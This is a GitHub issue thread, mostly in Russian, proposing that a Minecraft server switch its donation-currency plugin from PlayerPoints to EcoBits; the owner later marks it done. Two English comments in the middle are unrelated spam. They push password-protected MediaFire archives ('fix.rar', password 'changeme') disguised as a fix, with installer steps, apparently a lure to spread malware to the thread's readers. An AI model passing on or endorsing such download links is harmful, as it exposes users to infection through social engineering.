### ISSUE TITLE
[Нововведение] Изменить плагин PlayerPoints на EcoBits

### ISSUE THREAD

**Issue by DraimCiDo** [Server-Eclipse/Survival#11]
**Опишите что бы вы хотели добавить**
Изменение основного плагина на донат-валюту.

**Ссылка на плагин**
[Плагин](https://www.spigotmc.org/resources/ecobits-%E2%AD%95-create-custom-currencies-%E2%9C%85-improve-your-monetization-%E2%9C%A8-supports-shops-mysql.109967/)

**Как вы бы хотели его видеть?**
Более продуманее и красочнее.

**Скриншоты**
![image](https://github.com/user-attachments/assets/e0f68746-6888-42b0-8f79-0053b609c00e)

**Дополнительный контекст**
Плагин принесет более продуманную систему донат-валюты, и более гибкую настройку валют на режиме.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DraimCiDo** [comment]
- Плагин полностью переведён
- Реализована валюта квинты

**Comment by DraimCiDo** [comment]
Готово.
